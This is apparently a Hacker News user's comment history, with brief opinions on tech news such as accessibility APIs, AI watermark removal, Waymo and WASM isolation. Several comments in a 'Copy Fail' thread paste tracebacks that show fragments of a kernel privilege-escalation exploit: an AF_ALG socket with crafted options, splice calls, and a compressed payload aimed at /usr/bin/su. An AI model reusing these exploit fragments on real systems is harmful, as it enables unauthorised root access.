HNHacker News
TopNewBestAskShowJobs

int0x29

860 karma · joined March 24, 2024

submissionscomments
int0x29··on Apple rejected my dictation app for using the accessibility API
> However, I would like to point out that Apple isn't totally wrong here because the accessibility API unfortunately is way too broadly scoped, and because of that you literally get access to everything on the computer like you you can screenshot listen and and move the cursor... This is completely ridiculous and the proper engineering solution would actually be to phase out the accessibility API and replace it with something that is narrowly scoped so you can grant specific permissions individually

If you don't have use of your hands you want that. The whole point of accessibility APIs is allowing arbitrary control of your computer via novel means. One of the big selling points of Dragon Natually Speaking is the ability to tell your computer to do things based on descriptions without a mouse. "open outlook", "click compose", "select subject", "type foo", etc.

And no the solution here is not computer vision with an LLM. Text and buttons rendered on my computer exist in memory somewhere as text and buttons. We should not need to convert them to pixels and back lossily to recover text and buttons. We should just expose things to the accessibility API and not guess.

int0x29··on Surface Laptop Ultra
Isn't it a mediatek CPU with an Nvidia GPU on the same package? At least thats what most of the reporting for nvidia laptop chips has been saying.
int0x29··on What Apple and Google are doing to push notifications
Worse it's from a marketing perspective if you read the guys bio.
int0x29··on Warm up your MacBook (2019)
The Donner Party begs to differ
int0x29··on Remove-AI-Watermarks – CLI and library for removing AI watermarks from images
Generating realistic video of arbitrary things and people at scale is quite a bit of a different game than retouching photos
int0x29··on Remove-AI-Watermarks – CLI and library for removing AI watermarks from images
Saying that watermarking fake things is bad kinda strongly implies it
int0x29··on Remove-AI-Watermarks – CLI and library for removing AI watermarks from images
Accepting blindly destroying the concept of thruth should not be the hacker ethos either.
int0x29··on A digital billboard company has the technology to make 3D ads on moving trucks
Ignoring whether the 3D effect is good or not, moving video on a moving billboard in moving traffic is a terrible idea which should be banned.
int0x29··on PS3 Emulator Devs Politely Ask That People Stop Flooding It with AI PRs
It really shouldn't be the RPCS3 devs' problem to fix other people's broken AI pipelines.
int0x29··on Dirty Frag: Universal Linux LPE
I'm curious what broke the embargo. Did it leak or did a third party find it independently?
int0x29··on Denuvo has been cracked in all single-player games it previously protected
Relying on CRC32 for integrity under hostile circumstances feels deeply flawed.
int0x29··on Copy Fail
Now the socket is blocked. Also probably should have realized the socket is defined earlier than its called

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 9, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/home/exploit.py", line 5, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) ^^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__ _socket.socket.__init__(self, family, type, proto, fileno) PermissionError: [Errno 13] Permission denied

int0x29··on Copy Fail
Edit: Ignore this I overlooked calling order. It is indeed blocked

~~My allegedly fully patched pixel 8 pro allowed an AF_ALG socket to open under termux without virtualization so I'm not sure the last but is true~~

int0x29··on Copy Fail
I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 8, in <module> f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) ^^^^^^^^^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

int0x29··on Copy Fail
Its not writing to the partition though is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.
int0x29··on Fast16: High-precision software sabotage 5 years before Stuxnet
Has anyone posted the windows service file yet? That looks just to be the loader.
int0x29··on A new spam policy for “back button hijacking”
Firefox had it in 2010. I don't remember when IE ditched it.
int0x29··on Midnight train from GA: A view of America from the tracks as airports struggle
Historically they've gotten backpay. Also they are trying to keep their jobs.
int0x29··on Arm AGI CPU
This looks like an existing pre planned product hastily rebranded AI
int0x29··on Our commitment to Windows quality
Last I used OSX (the version prior to the current latest IIRC) not all of the "suggestions" could be turned off
int0x29··on Full Disclosure: A Third (and Fourth) Azure Sign-In Log Bypass Found
I definitely remember DOGE gutting CISA. Other cuts were not always due to DOGE. A good chunk of the FBI's computer security and counter intelligence people got reassigned to immigration enforcement. The committee investigating the US cell network hacks got cut extensively but I don't remember who did it.
int0x29··on Full Disclosure: A Third (and Fourth) Azure Sign-In Log Bypass Found
Don't worry CISA and any other involved regulator were gutted by DOGE.
int0x29··on Full Disclosure: A Third (and Fourth) Azure Sign-In Log Bypass Found
Ars just republished it under license
int0x29··on Waymo Safety Impact
The new (as of now than a year ago) Waymo cars still had human safety drivers last I saw one (a month or two ago). I also don't see them taking customers. So they do seem to slow roll hardware rollouts.
int0x29··on Waymo Safety Impact
Nearly got T-boned in a Lyft in LA. I am lucky to still be alive as the driver was not aware and should not have been driving. Where available I've stopped using human driven rideshare.
int0x29··on Google details new 24-hour process to sideload unverified Android apps
Most of the victims were last in school in the 1960s when all this stuff didn't exist. Also from experience teaching people with dementia or memory issues is kinda challenging as they just forget.
int0x29··on Microsoft's 'unhackable' Xbox One has been hacked by 'Bliss'
That game console isn't in a data center with CCTV coverage, mandatory access control, guards, and employees with background checks. If somone is soldering wires to your server and doing fault injection something has gone very wrong. Azure Government customers also don't have to worry about the NSA demanding access.
int0x29··on Qatar helium shutdown puts chip supply chain on a two-week clock
The strait is now mined at least partially. Country of origin doesn't matter when there are mines in the water.
int0x29··on Seeing Like a Sedan
I would challenge two parts of Musk's argument: that a computer camera system can cost effectively emulate human driving and vision performance and the idea that humans are safe drivers with only eyes.
int0x29··on Let's discuss sandbox isolation
Its worth pointing out another boundary: speculative execution. If sensitive data is in process memory with a WASM VM it can be read even if the VM doesn't expose it. This is also true of multiple WASM VMs running for different parties. For WASM isolation to work the VM needs to be in a seperate process
← PreviousPage 2 of 7Next →